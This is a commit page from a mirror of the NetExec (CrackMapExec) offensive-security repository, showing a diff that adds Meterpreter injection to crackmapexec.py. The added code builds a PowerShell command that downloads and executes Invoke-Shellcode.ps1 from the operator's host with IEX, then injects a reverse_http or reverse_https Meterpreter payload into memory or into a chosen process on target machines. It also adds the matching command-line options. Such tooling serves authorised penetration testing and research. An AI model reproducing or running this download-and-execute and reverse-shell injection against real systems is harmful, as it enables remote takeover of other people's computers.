swisskyrepo
/
NetExec
mirror of https://github.com/swisskyrepo/NetExec.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Added option to directly inject meterpreter into memory using Invoke-Shellcode

main
byt3bl33d3r 2015-10-07 19:34:05 -06:00
parent be72603423
commit 0362c9fcb3
1 changed files with 30 additions and 10 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

40
crackmapexec.py
View File

@ -2661,7 +2661,19 @@ def ps_command(command=None, katz_ip=None, katz_command='privilege::debug sekurl
def inject_pscommand(localip):
if args.inject == 'shellcode':
if args.inject == 'meterpreter':
command = """
IEX (New-Object Net.WebClient).DownloadString('http://{}/Invoke-Shellcode.ps1');
Invoke-Shellcode -Force -Payload windows/meterpreter/{} -Lhost {} -Lport {}""".format(localip,
args.met,
args.met_options[0],
args.met_options[1])
if args.procid:
command += " -ProcessID {}".format(args.procid)
command += ';'
elif args.inject == 'shellcode':
command = """
IEX (New-Object Net.WebClient).DownloadString('http://{addr}/Invoke-Shellcode.ps1');
$WebClient = New-Object System.Net.WebClient;
@ -2997,11 +3009,13 @@ if __name__ == '__main__':
cgroup.add_argument("-x", metavar="COMMAND", dest='command', help="Execute the specified command")
cgroup.add_argument("-X", metavar="PS_COMMAND", dest='pscommand', help='Excute the specified powershell command')
xgroup = parser.add_argument_group("Shellcode/EXE/DLL Injection", "Options for injecting Shellcode/EXE/DLL's in memory using PowerShell")
xgroup.add_argument("--inject", choices={'shellcode', 'exe', 'dll'}, help='Inject Shellcode, EXE or a DLL')
xgroup = parser.add_argument_group("Shellcode/EXE/DLL/Meterpreter Injection", "Options for injecting Shellcode/EXE/DLL/Meterpreter in memory using PowerShell")
xgroup.add_argument("--inject", choices={'shellcode', 'exe', 'dll', 'meterpreter'}, help='Inject Shellcode, EXE, DLL or Meterpreter')
xgroup.add_argument("--path", type=str, help='Path to the Shellcode/EXE/DLL you want to inject on the target systems')
xgroup.add_argument('--procid', type=int, help='Process ID to inject the Shellcode/EXE/DLL into (if omitted, will inject within the running PowerShell process)')
xgroup.add_argument('--procid', type=int, help='Process ID to inject the Shellcode/EXE/DLL/Meterpreter into (if omitted, will inject within the running PowerShell process)')
xgroup.add_argument("--exeargs", type=str, help='Arguments to pass to the EXE being reflectively loaded (ignored if not injecting an EXE)')
xgroup.add_argument("--met", choices={'reverse_http', 'reverse_https'}, dest='met', help='Specify the Meterpreter to inject')
xgroup.add_argument("--met-options", nargs=2, metavar=('LHOST', 'LPORT'), dest='met_options', help='Meterpreter options')
bgroup = parser.add_argument_group("Filesystem Interaction", "Options for interacting with filesystems")
bgroup.add_argument("--list", metavar='PATH', help='List contents of a directory')
@ -3022,13 +3036,19 @@ if __name__ == '__main__':
log.setLevel(logging.INFO)
if args.inject:
if not args.path:
print_error("You must specify a '--path' to the Shellcode/EXE/DLL to inject")
sys.exit(1)
if args.inject != 'meterpreter':
if not args.path:
print_error("You must specify a '--path' to the Shellcode/EXE/DLL to inject")
sys.exit(1)
elif args.path:
if not os.path.exists(args.path):
print_error('Unable to find Shellcode/EXE/DLL at specified path')
elif args.path:
if not os.path.exists(args.path):
print_error('Unable to find Shellcode/EXE/DLL at specified path')
sys.exit(1)
elif args.inject == 'meterpreter':
if not args.met_options or not args.met:
print_error('You must specify a Meterpreter and it\'s options using \'--met\' and \'--met-options\'' )
sys.exit(1)
if os.path.exists(args.target[0]):